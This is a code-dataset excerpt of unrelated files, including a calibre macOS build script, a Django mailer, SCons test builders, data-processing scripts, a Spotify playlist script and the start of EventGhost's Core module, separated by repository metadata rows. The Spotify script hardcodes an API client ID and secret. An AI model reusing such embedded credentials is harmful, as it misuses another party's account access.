pl = dict(
CFBundleDevelopmentRegion='English',
CFBundleDisplayName=APPNAME,
CFBundleName=APPNAME,
CFBundleIdentifier='net.kovidgoyal.calibre',
CFBundleVersion=VERSION,
CFBundleShortVersionString=VERSION,
CFBundlePackageType='APPL',
CFBundleSignature='????',
CFBundleExecutable='calibre',
CFBundleDocumentTypes=docs,
LSMinimumSystemVersion='10.5.2',
LSRequiresNativeExecution=True,
NSAppleScriptEnabled=False,
NSHumanReadableCopyright='Copyright 2010, Kovid Goyal',
CFBundleGetInfoString=('calibre, an E-book management '
'application. Visit http://calibre-ebook.com for details.'),
CFBundleIconFile='library.icns',
LSMultipleInstancesProhibited=True,
NSHighResolutionCapable=True,
LSEnvironment=env
)
plistlib.writePlist(pl, join(self.contents_dir, 'Info.plist'))
@flush
def install_dylib(self, path, set_id=True):
shutil.copy2(path, self.frameworks_dir)
if set_id:
self.set_id(join(self.frameworks_dir, basename(path)),
self.FID+'/'+basename(path))
self.fix_dependencies_in_lib(join(self.frameworks_dir, basename(path)))
@flush
def add_podofo(self):
info('\nAdding PoDoFo')
pdf = join(SW, 'lib', 'libpodofo.0.9.1.dylib')
self.install_dylib(pdf)
@flush
def add_poppler(self):
info('\nAdding poppler')
for x in ('libpoppler.27.dylib',):
self.install_dylib(os.path.join(SW, 'lib', x))
for x in ('pdftohtml', 'pdftoppm', 'pdfinfo'):
self.install_dylib(os.path.join(SW, 'bin', x), False)
@flush
def add_libjpeg(self):
info('\nAdding libjpeg')
self.install_dylib(os.path.join(SW, 'lib', 'libjpeg.8.dylib'))
@flush
def add_libpng(self):
info('\nAdding libpng')
self.install_dylib(os.path.join(SW, 'lib', 'libpng12.0.dylib'))
self.install_dylib(os.path.join(SW, 'lib', 'libpng.3.dylib'))
@flush
def add_fontconfig(self):
info('\nAdding fontconfig')
for x in ('fontconfig.1', 'freetype.6', 'expat.1'):
src = os.path.join(SW, 'lib', 'lib'+x+'.dylib')
self.install_dylib(src)
dst = os.path.join(self.resources_dir, 'fonts')
if os.path.exists(dst):
shutil.rmtree(dst)
src = os.path.join(SW, 'etc', 'fonts')
shutil.copytree(src, dst, symlinks=False)
fc = os.path.join(dst, 'fonts.conf')
raw = open(fc, 'rb').read()
raw = raw.replace('<dir>/usr/share/fonts</dir>', '''\
<dir>/Library/Fonts</dir>
<dir>/Network/Library/Fonts</dir>
<dir>/System/Library/Fonts</dir>
<dir>/usr/X11R6/lib/X11/fonts</dir>
<dir>/usr/share/fonts</dir>
<dir>/var/root/Library/Fonts</dir>
<dir>/usr/share/fonts</dir>
''')
open(fc, 'wb').write(raw)
@flush
def add_imagemagick(self):
info('\nAdding ImageMagick')
for x in ('Wand', 'Core'):
self.install_dylib(os.path.join(SW, 'lib', 'libMagick%s.5.dylib'%x))
idir = glob.glob(os.path.join(SW, 'lib', 'ImageMagick-*'))[-1]
dest = os.path.join(self.frameworks_dir, 'ImageMagick')
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(idir, dest, True)
for x in os.walk(dest):
for f in x[-1]:
if f.endswith('.so'):
f = join(x[0], f)
self.fix_dependencies_in_lib(f)
@flush
def add_misc_libraries(self):
for x in ('usb-1.0.0', 'mtp.9', 'unrar', 'readline.6.1',
'wmflite-0.2.7', 'chm.0', 'sqlite3.0'):
info('\nAdding', x)
x = 'lib%s.dylib'%x
shutil.copy2(join(SW, 'lib', x), self.frameworks_dir)
dest = join(self.frameworks_dir, x)
self.set_id(dest, self.FID+'/'+x)
if 'mtp' in x:
self.fix_dependencies_in_lib(dest)
@flush
def add_site_packages(self):
info('\nAdding site-packages')
os.makedirs(self.site_packages)
paths = reversed(map(abspath, [x for x in sys.path if x.startswith('/')]))
upaths = []
for x in paths:
if x not in upaths and (x.endswith('.egg') or
x.endswith('/site-packages')):
upaths.append(x)
upaths.append(os.path.expanduser('~/build/calibre/src'))
for x in upaths:
info('\t', x)
tdir = None
try:
if not os.path.isdir(x):
try:
zf = zipfile.ZipFile(x)
except:
self.warn(x, 'is neither a directory nor a zipfile')
continue
tdir = tempfile.mkdtemp()
zf.extractall(tdir)
x = tdir
self.add_modules_from_dir(x)
self.add_packages_from_dir(x)
finally:
if tdir is not None:
shutil.rmtree(tdir)
shutil.rmtree(os.path.join(self.site_packages, 'calibre', 'plugins'))
self.remove_bytecode(join(self.resources_dir, 'Python', 'site-packages'))
@flush
def add_modules_from_dir(self, src):
for x in glob.glob(join(src, '*.py'))+glob.glob(join(src, '*.so')):
shutil.copy2(x, self.site_packages)
if x.endswith('.so'):
self.fix_dependencies_in_lib(x)
@flush
def add_packages_from_dir(self, src):
for x in os.listdir(src):
x = join(src, x)
if os.path.isdir(x) and os.path.exists(join(x, '__init__.py')):
if self.filter_package(basename(x)):
continue
self.add_package_dir(x)
@flush
def add_package_dir(self, x, dest=None):
def ignore(root, files):
ans = []
for y in files:
ext = os.path.splitext(y)[1]
if ext not in ('', '.py', '.so') or \
(not ext and not os.path.isdir(join(root, y))):
ans.append(y)
return ans
if dest is None:
dest = self.site_packages
dest = join(dest, basename(x))
shutil.copytree(x, dest, symlinks=True, ignore=ignore)
self.postprocess_package(x, dest)
for x in os.walk(dest):
for f in x[-1]:
if f.endswith('.so'):
f = join(x[0], f)
self.fix_dependencies_in_lib(f)
@flush
def filter_package(self, name):
return name in ('Cython', 'modulegraph', 'macholib', 'py2app',
'bdist_mpkg', 'altgraph')
@flush
def postprocess_package(self, src_path, dest_path):
pass
@flush
def add_stdlib(self):
info('\nAdding python stdlib')
src = '/sw/python/Python.framework/Versions/Current/lib/python'
src += self.version_info
dest = join(self.resources_dir, 'Python', 'lib', 'python')
dest += self.version_info
os.makedirs(dest)
for x in os.listdir(src):
if x in ('site-packages', 'config', 'test', 'lib2to3', 'lib-tk',
'lib-old', 'idlelib', 'plat-mac', 'plat-darwin', 'site.py'):
continue
x = join(src, x)
if os.path.isdir(x):
self.add_package_dir(x, dest)
elif os.path.splitext(x)[1] in ('.so', '.py'):
shutil.copy2(x, dest)
dest2 = join(dest, basename(x))
if dest2.endswith('.so'):
self.fix_dependencies_in_lib(dest2)
self.remove_bytecode(join(self.resources_dir, 'Python', 'lib'))
confdir = join(self.resources_dir, 'Python',
'lib/python%s/config'%self.version_info)
os.makedirs(confdir)
shutil.copy2(join(src, 'config/Makefile'), confdir)
incdir = join(self.resources_dir, 'Python',
'include/python'+self.version_info)
os.makedirs(incdir)
shutil.copy2(join(src.replace('/lib/', '/include/'), 'pyconfig.h'),
incdir)
@flush
def remove_bytecode(self, dest):
for x in os.walk(dest):
root = x[0]
for f in x[-1]:
if os.path.splitext(f) in ('.pyc', '.pyo'):
os.remove(join(root, f))
@flush
def compile_py_modules(self):
info( '\nCompiling Python modules')
base = join(self.resources_dir, 'Python')
for x in os.walk(base):
root = x[0]
for f in x[-1]:
if f.endswith('.py'):
y = join(root, f)
rel = os.path.relpath(y, base)
try:
py_compile.compile(y, dfile=rel, doraise=True)
os.remove(y)
except:
self.warn('WARNING: Failed to byte-compile', y)
@flush
def create_console_app(self):
info( '\nCreating console.app')
cc_dir = os.path.join(self.contents_dir, 'console.app', 'Contents')
os.makedirs(cc_dir)
for x in os.listdir(self.contents_dir):
if x == 'console.app':
continue
if x == 'Info.plist':
plist = plistlib.readPlist(join(self.contents_dir, x))
plist['LSUIElement'] = '1'
plist.pop('CFBundleDocumentTypes')
plistlib.writePlist(plist, join(cc_dir, x))
else:
os.symlink(join('../..', x),
join(cc_dir, x))
@flush
def copy_site(self):
base = os.path.dirname(__file__)
shutil.copy2(join(base, 'site.py'), join(self.resources_dir, 'Python',
'lib', 'python'+self.version_info))
@flush
def makedmg(self, d, volname,
destdir='dist',
internet_enable=True,
format='UDBZ'):
''' Copy a directory d into a dmg named volname '''
info('\nCreating dmg')
sys.stdout.flush()
if not os.path.exists(destdir):
os.makedirs(destdir)
dmg = os.path.join(destdir, volname+'.dmg')
if os.path.exists(dmg):
os.unlink(dmg)
tdir = tempfile.mkdtemp()
appdir = os.path.join(tdir, os.path.basename(d))
shutil.copytree(d, appdir, symlinks=True)
subprocess.check_call(['/Users/kovid/sign.sh', appdir])
os.symlink('/Applications', os.path.join(tdir, 'Applications'))
subprocess.check_call(['/usr/bin/hdiutil', 'create', '-srcfolder', tdir,
'-volname', volname, '-format', format, dmg])
shutil.rmtree(tdir)
if internet_enable:
subprocess.check_call(['/usr/bin/hdiutil', 'internet-enable', '-yes', dmg])
size = os.stat(dmg).st_size/(1024*1024.)
info('\nInstaller size: %.2fMB\n'%size)
return dmg
def test_exe():
build_dir = abspath(join('build', APPNAME+'.app'))
py2app = Py2App(build_dir)
py2app.create_exe()
return 0
def main(test=False):
if 'test_exe' in sys.argv:
return test_exe()
build_dir = abspath(join(os.path.dirname(SRC), 'build', APPNAME+'.app'))
Py2App(build_dir, test_launchers=test)
return 0
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | 4,389,795,545,550,242,300 | 35.423313 | 116 | 0.542909 | false |
Tecktron/quickmailer | quickmail.py | 1 | 3408 | import argparse
import os
import re
import sys
if __name__ == "__main__":
if sys.version_info < (3, 0):
print("This script requires version 3+ of python. Please try running it with command 'python3' instead")
exit(8)
parser = argparse.ArgumentParser(
description="Quick Mailer"
)
parser.add_argument("-m", "--message", dest="msg", type=str, required=True,
help="The plain text message or filename of a message to send")
parser.add_argument("-t", "--to", dest="to", nargs="+", metavar="[email protected]", type=str,
help="Email address to recieve the message", required=True)
parser.add_argument("-f", "--from", dest="sender", type=str, required=False,
help="The from Email, if not provided, the settings will be used. NOTE: A specific address may "
"be required by your SMTP server")
parser.add_argument("-s", "--subject", dest="subject", required=True, type=str, help="The subject line")
parser.add_argument("-w", "--html", dest="html", action="store_true", required=False,
help="If using a file for m and file is html set this flag to use html email")
parser.add_argument("-a", "--attach", dest="attach", metavar="/path/to/file.txt", nargs="*", required=False,
help="files to attach (use full path)", default=[])
args = parser.parse_args()
# Here we inject the settings and load django
if not os.environ.get("DJANGO_SETTINGS_MODULE", False):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "base.settings")
try:
import django
from django.conf import settings
except ImportError:
django = None
settings = None
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
django.setup()
# don't import Django things until after setup or errors abound
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.utils.html import strip_tags
msg = ""
is_file = False
if os.path.isfile(args.msg) is False:
msg = "{}".format(args.msg)
else:
try:
msg = open(args.msg).read()
except OSError as e:
print("Could not read msg file, exception said: {}".format(e))
exit(4)
sender = args.sender
if not sender:
sender = settings.DEFAULT_FROM_EMAIL
if args.html:
# quick and dirty, create a plain text version.
# replace breaks and paragraphs with newlines
plain = re.sub("<br\s*?>", "\n", msg)
plain = re.sub("</p>", "\n\n", plain)
# strip the rest of the tags.
plain = strip_tags(plain)
email = EmailMultiAlternatives(args.subject, plain, sender, args.to)
email.attach_alternative(msg, "text/html")
else:
email = EmailMessage(args.subject, msg, sender, args.to)
if len(args.attach):
for attachment in args.attach:
if os.path.isfile(attachment):
email.attach_file(attachment)
sent = email.send()
if sent:
print("Email sent successfully")
else:
print("There was an issue sending the message")
| mit | -8,947,849,462,155,596,000 | 39.094118 | 120 | 0.60446 | false |
eidonfiloi/SparseRecurrentNetwork | tests/SerializationTest.py | 1 | 1546 | __author__ = 'ptoth'
import config.sr_network_configuration_test as base_config
import unittest
import numpy as np
from recurrent_network.Network import *
class SerializationTest(unittest.TestCase):
def test_pickle(self):
params = base_config.get_config()
params['global']['epochs'] = 2
network = SRNetwork(params['network'])
constant = np.array([
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0]
])
inputs = constant
for inp in inputs:
output = network.run(inp)
weights = network.layers[0].feedforward_node.weights
with open('test_network_serialized.pickle', 'wb') as f:
pickle.dump(network, f)
# network.serialize('test_network_serialized.pickle')
with open('test_network_serialized.pickle', "rb") as f:
x = pickle.load(f)
network_loaded = x
print network_loaded
self.assertTrue((weights[0] == network_loaded.layers[0].feedforward_node.weights[0]).all())
| mit | 8,890,712,304,412,624,000 | 30.55102 | 99 | 0.518111 | false |
pkrusche/bsponmpi_template | site_scons/site_tools/unit_tests.py | 1 | 1693 | ###############################################################################
# Copyright (C) 2013 Peter Krusche, The University of Warwick
# [email protected]
###############################################################################
import os
from SCons.Script import *
###############################################################################
# Unit Testing
###############################################################################
"""Unit test builder function
"""
def builder_unit_test(target, source, env):
app = str(source[0].abspath)
xenv = os.environ
if 'TEST_ENV' in env:
for k in env['TEST_ENV']:
xenv[k] = env['TEST_ENV'][k]
if os.spawnle(os.P_WAIT, app, app, xenv) == 0:
open(str(target[0]),'w').write("PASSED\n")
else:
return 1
"""Unit test builder function which uses MPI
"""
def builder_unit_test_mpi(target, source, env):
# for MPI tests, we run with these processor counts
mpiexec = env["mpiexec"]
mpiexec_params = env["mpiexec_params"]
app = str(source[0].abspath)
runme = mpiexec + " " + mpiexec_params + ' "' + app + '" > ' + str(target[0])
print "Test: running " + runme
if os.system(runme) == 0:
open(str(target[0]),'a').write("PASSED\n")
else:
return 1
"""Set up an environment for using unit testing
@param env : the environment
"""
def generate(env):
# Create a builder for tests
if not env['mpiexec']:
bld = Builder(action = builder_unit_test)
env.Append(BUILDERS = {'Test' : bld})
else:
bld = Builder(action = builder_unit_test_mpi)
env.Append(BUILDERS = {'Test' : bld})
"""Check if environment supports unit testing
@param env : the environment
"""
def exists(env):
return 1
| mit | 7,341,181,985,593,530,000 | 25.046154 | 79 | 0.532191 | false |
NCLAB2016/DF_STEALL_ELECTRIC | merge_feature.py | 1 | 3169 | #!/usr/bin/python
import csv
import numpy as np
from six.moves import cPickle as pickle
# read in data
dataset = 'dataset/'
train_season_statis_filename = dataset + 'final_train_season_statis.pickle'
train_month_statis_filename = dataset + 'final_train_month_statis.pickle'
train_dwt_filename = dataset + 'final_train_dwt.pickle'
train_all_data_filename = dataset + 'final_train_data_statis.pickle'
test_season_statis_filename = dataset + 'final_test_season_statis.pickle'
test_month_statis_filename = dataset + 'final_test_month_statis.pickle'
test_dwt_filename = dataset + 'final_test_dwt.pickle'
test_all_data_filename = dataset + 'final_test_data_statis.pickle'
with open(train_season_statis_filename, 'rb') as f:
train_season_statis = pickle.load(f)
with open(train_month_statis_filename, 'rb') as f:
train_month_statis = pickle.load(f)
with open(train_dwt_filename, 'rb') as f:
train_dwt = pickle.load(f)
with open(train_all_data_filename, 'rb') as f:
train_all_data = pickle.load(f)
with open(test_season_statis_filename, 'rb') as f:
test_season_statis = pickle.load(f)
with open(test_month_statis_filename, 'rb') as f:
test_month_statis = pickle.load(f)
with open(test_dwt_filename, 'rb') as f:
test_dwt = pickle.load(f)
with open(test_all_data_filename, 'rb') as f:
test_all_data = pickle.load(f)
from sklearn.decomposition import PCA
print ('train all data: ', train_all_data.shape)
print ('test all data: ', test_all_data.shape)
print ('construct train & test data...')
for i in range(len(train_all_data)):
for j in range(len(train_all_data[i])):
if train_all_data[i][j] != train_all_data[i][j]:
train_all_data[i][j] = -1
train_data = PCA(100).fit_transform(train_all_data[:,:3105])
test_data = PCA(100).fit_transform(test_all_data[:,:3105])
train_data = np.column_stack((train_data, train_all_data[:,3105:]))
test_data = np.column_stack((test_data, test_all_data[:,3105:]))
print ('train month statis: ', train_month_statis.shape)
print ('test month statis: ', test_month_statis.shape)
print ('connect month statis...')
train_data = np.column_stack((train_data, PCA(50).fit_transform(train_month_statis)))
test_data = np.column_stack((test_data, PCA(50).fit_transform(test_month_statis)))
print ('train season statis: ', train_season_statis.shape)
print ('test season statis: ', test_season_statis.shape)
print ('connect season statis...')
train_data = np.column_stack((train_data, PCA(30).fit_transform(train_season_statis)))
test_data = np.column_stack((test_data, PCA(30).fit_transform(test_season_statis)))
print ('train dwt statis: ', train_dwt.shape)
print ('test dwt statis: ', test_dwt.shape)
print ('connect dwt...')
train_data = np.column_stack((train_data, PCA(5).fit_transform(train_dwt)))
test_data = np.column_stack((test_data, PCA(5).fit_transform(test_dwt)))
print ('final, train data: ', train_data.shape)
print ('test data: ', test_data.shape)
print ('write data now..')
with open(dataset + 'final_train_amsd.pickle', 'wb') as f:
pickle.dump(train_data, f, pickle.HIGHEST_PROTOCOL)
with open(dataset + 'final_test_amsd.pickle', 'wb') as f:
pickle.dump(test_data, f, pickle.HIGHEST_PROTOCOL)
| gpl-3.0 | -4,707,812,709,093,395,000 | 38.6125 | 86 | 0.712212 | false |
siquick/mostplayed | mp/ss_playlist.py | 1 | 2275 | import requests
import json
import hashlib # used to generate the key for the insert
import base64
def req_auth():
# request authorization
auth_code = base64.b64encode('2b9b835a9d2d45eab79778233e9142e4:6783d4b5790a4f5aaa94b863c30fc215')
headers = {'Authorization': 'Basic ' + auth_code}
auth_url = 'https://accounts.spotify.com/api/token'
body = {'grant_type': 'client_credentials'}
r = requests.post(auth_url, data=body, headers=headers)
r_json = json.loads(r.text)
return r_json['access_token']
# gets a list of the good records that are on Spotify
def get_records():
query = db_select('''SELECT x.spotify_url,x.date,x.id,x.all_artists,x.title,sum(num) as total FROM
(SELECT releases.*,COUNT(listens.release_id) * 5 as num
FROM soundshe.releases_all releases
INNER JOIN soundshe.listens
ON listens.release_id=releases.id
#WHERE year(releases.date)='2017'
GROUP BY releases.id
UNION ALL
SELECT releases.*,COUNT(ce.release_id) * 10 as num
FROM soundshe.releases_all releases
INNER JOIN soundshe.charts_extended ce
ON ce.release_id=releases.id
#WHERE year(releases.date)='2017'
WHERE ce.url!='Ghost'
GROUP BY releases.id
UNION ALL
SELECT releases.*,COUNT(buys.release_id) * 15 as num
FROM soundshe.releases_all releases
INNER JOIN soundshe.buys
ON buys.release_id=releases.id
#WHERE year(releases.date)='2017'
GROUP BY releases.id
) as x
WHERE x.spotify_url!=''
AND datediff(now(),x.date) < 30
AND x.genre IN ('House','Techno','Disco','Bass')
GROUP by x.id
ORDER BY total DESC
LIMIT 0,10''', ())
get_data = query.fetchall()
for row in get_data:
print(row[0], row[3], row[4])
# add_done = add_tracks(access_token,num_tracks,time_range,user_id,owner_id,playlist_id,now)
access_token = get_access_token(code)
print(access_token)
# x = get_records()
# print(x)
| gpl-3.0 | 4,837,883,844,478,587,000 | 35.693548 | 102 | 0.57978 | false |
sonofmun/DissProject | Chapter_3/graph_cs_corps.py | 1 | 1217 | __author__ = 'matt'
"""
Bar chart demo with pairs of bars grouped for easy comparison.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#corps = [('NT', (0, 1, 2, 3, 4, 5)), ('LXX', (0, 1, 2, 3, 4, 5)), ('Josephus', (0, 1, 2, 3, 4, 5)), ('Philo', (0, 1, 2, 3, 4, 5)), ('Plutarch', (0, 1, 2, 3, 4, 5)), ('Perseus', (0, 1, 2, 3, 4, 5))]
corps = pd.DataFrame(np.random.random(size=(6, 6)), index=['NT', 'LXX', 'Josephus', 'Philo', 'Plutarch', 'Perseus'], columns=['NT', 'LXX', 'Josephus', 'Philo', 'Plutarch', 'Perseus'])
fig, ax = plt.subplots()
index = np.arange(len(corps))*1.2
bar_width = 0.15
opacity = 0.4
#error_config = {'ecolor': '0.3'}
mult = 0
for corp in corps:
rects = plt.bar(index + bar_width * mult, corps.ix[corp], bar_width, color='.9', label=corp)
rects.remove()
for i, rect in enumerate(rects):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2., height / 2, corp, size='small', rotation='vertical', ha='center', va='bottom')
mult += 1
plt.xlabel('Group')
plt.ylabel('Scores')
plt.title('Scores by group and gender')
plt.xticks(index + 3 * bar_width, [x for x in corps])
plt.savefig('cs_corps_test.png', dpi=500) | gpl-3.0 | -7,344,222,544,633,724,000 | 32.833333 | 198 | 0.598192 | false |
joelvbernier/hexrd-sandbox | multipanel_ff/spot_montage.py | 1 | 4998 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 19 15:29:27 2017
@author: bernier2
"""
import argparse
import numpy as np
import h5py
from matplotlib import pyplot as plt
"""
# UNCOMMENT IF YOU HAVE A SANE LATEX ENV AND WANT NICE FIG LABELS
#
# Options
params = {'text.usetex': True,
'font.size': 14,
'font.family': 'mathrm',
'text.latex.unicode': True,
'pgf.texsystem': 'pdflatex'
}
plt.rcParams.update(params)
"""
plt.ion()
def montage(X, colormap=plt.cm.inferno, show_borders=True,
title=None, xlabel=None, ylabel=None,
threshold=None, filename=None):
m, n, count = np.shape(X)
img_data = np.log(X - np.min(X) + 1)
if threshold is None:
threshold = 0.
else:
threshold = np.log(threshold - np.min(X) + 1)
mm = int(np.ceil(np.sqrt(count)))
nn = mm
M = np.zeros((mm * m, nn * n))
# colormap
colormap.set_under('b')
fig, ax = plt.subplots()
image_id = 0
for j in range(mm):
sliceM = j * m
ax.plot()
for k in range(nn):
if image_id >= count:
img = np.nan*np.ones((m, n))
else:
img = img_data[:, :, image_id]
sliceN = k * n
M[sliceM:sliceM + m, sliceN:sliceN + n] = img
image_id += 1
# M = np.sqrt(M + np.min(M))
im = ax.imshow(M, cmap=colormap, vmin=threshold, interpolation='nearest')
if show_borders:
xs = np.vstack(
[np.vstack([[n*i, n*i] for i in range(nn+1)]),
np.tile([0, nn*n], (mm+1, 1))]
)
ys = np.vstack(
[np.tile([0, mm*m], (nn+1, 1)),
np.vstack([[m*i, m*i] for i in range(mm+1)])]
)
for xp, yp in zip(xs, ys):
ax.plot(xp, yp, 'c:')
if xlabel is None:
ax.set_xlabel(r'$2\theta$', FontSize=14)
else:
ax.set_xlabel(xlabel, FontSize=14)
if ylabel is None:
ax.set_ylabel(r'$\eta$', FontSize=14)
else:
ax.set_ylabel(ylabel, FontSize=14)
ax.axis('normal')
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
cbar_ax = fig.add_axes([0.875, 0.155, 0.025, 0.725])
cbar = fig.colorbar(im, cax=cbar_ax)
cbar.set_label(r"$\ln(intensity)$", labelpad=5)
ax.set_xticks([])
ax.set_yticks([])
if title is not None:
ax.set_title(title, FontSize=18)
if filename is not None:
fig.savefig(filename, bbox_inches='tight', dpi=300)
return M
def plot_gvec_from_hdf5(fname, gvec_id, threshold=0.):
"""
"""
f = h5py.File(fname, 'r')
for det_key, panel_data in f['reflection_data'].iteritems():
for spot_id, spot_data in panel_data.iteritems():
attrs = spot_data.attrs
if attrs['hkl_id'] == gvec_id:
# grab some data
tth_crd = np.degrees(spot_data['tth_crd'])
eta_crd = np.degrees(spot_data['eta_crd'])
intensities = np.transpose(
np.array(spot_data['intensities']),
(1, 2, 0)
)
# make labels
figname = r'Spot %d, ' % attrs['peak_id'] \
+ r"detector '%s', " % det_key \
+ r'({:^3} {:^3} {:^3})'.format(*attrs['hkl'])
xlabel = r'$2\theta\in(%.3f, %.3f)$' \
% (tth_crd[0], tth_crd[-1])
ylabel = r'$\eta\in(%.3f, %.3f)$' \
% (eta_crd[0], eta_crd[-1])
# make montage
montage(intensities, title=figname,
xlabel=xlabel, ylabel=ylabel,
threshold=threshold)
pass
pass
pass
f.close()
return
# =============================================================================
# %% CMD LINE HOOK
# =============================================================================
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Montage of spot data for a specifed G-vector family")
parser.add_argument('hdf5_archive',
help="hdf5 archive filename",
type=str)
parser.add_argument('gvec_id',
help="unique G-vector ID from PlaneData",
type=int)
parser.add_argument('-t', '--threshold',
help="intensity threshold",
type=float, default=0.)
args = parser.parse_args()
h5file = args.hdf5_archive
hklid = args.gvec_id
threshold = args.threshold
plot_gvec_from_hdf5(h5file, hklid, threshold=threshold) | gpl-3.0 | 2,192,930,690,850,654,200 | 29.055901 | 79 | 0.473589 | false |
SwordYoung/cutprob | leetcode/palantir/test.py | 1 | 3464 | #!/usr/bin/env python
class Solution:
def __init__(self):
self.solution_dict = {}
self.n_set = set()
self.gcd = []
def pre_quit(self, in_n, in_b, up_bound):
if in_n < 0 or in_b < 0:
return True, -1 # impossible
if in_n == 0:
return True, 0
if in_n in self.n_set:
return True, 1
if in_n % self.gcd[in_b] != 0:
return True, -1
max_possible = in_n / self.in_b_numbers[in_b]
if in_n % self.in_b_numbers[in_b] == 0:
return True, max_possible
if up_bound != -1 and max_possible >= up_bound:
return True, -1
return False, 0
def find_solution(self, in_n, in_b, up_bound):
is_pre_quit, ret_value = self.pre_quit(in_n, in_b, up_bound)
if is_pre_quit:
return ret_value
max_possible = in_n / self.in_b_numbers[in_b]
min_sum = -1
min_iter = up_bound
for i in xrange(max_possible, -1, -1):
if min_iter == 0:
break
res = self.find_solution(in_n - self.in_b_numbers[in_b] * i, in_b-1, -1 if up_bound == -1 else up_bound-i)
if res != -1:
if min_iter == -1 or min_iter > res:
min_iter = res
res = res + i
if min_sum == -1 or min_sum > res:
min_sum = res
if up_bound == -1:
up_bound = min_sum
if min_iter != -1:
min_iter -= 1
return min_sum
def calculate_gcd(self):
def cal_gcd(a, b):
if a < b:
return cal_gcd(b, a)
if b == 0:
return a
return cal_gcd(a % b, b)
self.gcd.append(self.in_b_numbers[0])
for i in xrange(1, len(self.in_b_numbers)):
self.gcd.append(cal_gcd(self.gcd[i-1], self.in_b_numbers[i]))
def solve(self, in_n, in_b, in_b_numbers):
self.in_n = in_n
self.in_b_numbers = in_b_numbers
self.in_b_numbers.sort()
self.n_set = set(self.in_b_numbers)
self.calculate_gcd()
result = self.find_solution(in_n, in_b-1, -1)
return result
def solve(in_n, in_b, in_b_numbers):
print "input: n is %d, b is %d" % (in_n, in_b)
print "in_b_numbers is %s" % (in_b_numbers)
result = Solution().solve(in_n, in_b, in_b_numbers)
if result == -1:
print "IMPOSSIBLE"
else:
print result
# utility function for input
def read_line():
line = raw_input()
line = line.strip()
return line
def read_strs():
line = read_line()
strs = line.split(' ')
return strs
def read_numbers():
nums = read_strs()
for i in xrange(len(nums)):
nums[i] = int(nums[i])
return nums
def runtest():
in_line1 = read_numbers()
in_n = in_line1[0]
in_b = in_line1[1]
in_b_numbers = read_numbers()
assert len(in_b_numbers) == in_b
solve(in_n, in_b, in_b_numbers)
def runtests():
num_tests = read_numbers()[0]
for i in xrange(num_tests):
runtest()
# if __name__ == "__main__":
if __name__ == "__test__":
runtests()
# if __name__ == "__test__":
if __name__ == "__main__":
infile = open("in.txt", 'r')
import sys
sys.stdin = infile
runtests()
infile.close()
| artistic-2.0 | 2,810,316,721,161,853,000 | 26.0625 | 118 | 0.480658 | false |
moneygrid/vertical-exchange | exchange/__openerp__.py | 1 | 1460 | # -*- coding: utf-8 -*-
# © <2016> <Moneygrid Project, Lucas Huber, Yannick Buron>
# based on account_wallet by Yannick Buron, Copyright Yannick Buron
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
{
'name': 'Exchange / Community Banking',
'version': '9.0.0.1.x',
'category': 'Exchange',
'author': 'Lucas Huber, moneygrid Project',
'license': 'LGPL-3',
'summary': 'Community Exchange/Wallet Backend',
'website': 'https://github.com/moneygrid/vertical-exchange',
'depends': [
'account_accountant',
'base_exchange',
'exchange_provider',
'exchange_provider_internal',
],
'data': [
# 'security/exchange_security.xml',
# 'security/ir.model.access.csv',
'views/exchange_account_view.xml',
'views/exchange_transaction_view.xml',
# 'test_view.xml',
# 'views/exchange_transaction_workflow.xml',
# 'data/exchange_data.xml',
# 'data/account_data.xml',
],
"""
'demo': ['demo/exchange_demo.xml'],
'test': [
'tests/account_wallet_users.yml',
'tests/account_wallet_rights.yml',
'tests/account_wallet_moderator.yml',
'tests/account_wallet_external.yml',
'tests/account_wallet_limits.yml',
'tests/account_wallet_balances.yml',
],
"""
'installable': True,
'application': True,
}
| gpl-3.0 | 6,206,304,104,556,870,000 | 32.930233 | 68 | 0.572995 | false |
WoLpH/EventGhost | eg/Core.py | 1 | 12315 | # -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
"""
.. attribute:: globals
:class:`eg.Bunch` instance, that holds all global variables used by
PythonCommand actions. PythonScripts (and all other code) can access
these globals through :obj:`eg.globals`.
.. attribute:: event
Instance of the :class:`eg.EventGhostEvent` instance, that is currently
been processed.
.. autofunction:: eg.DummyFunc
"""
import asyncore
import locale
import os
import socket
import sys
import threading
import time
import wx
from os.path import exists, join
# Local imports
import eg
import Init
eg.APP_NAME = "EventGhost"
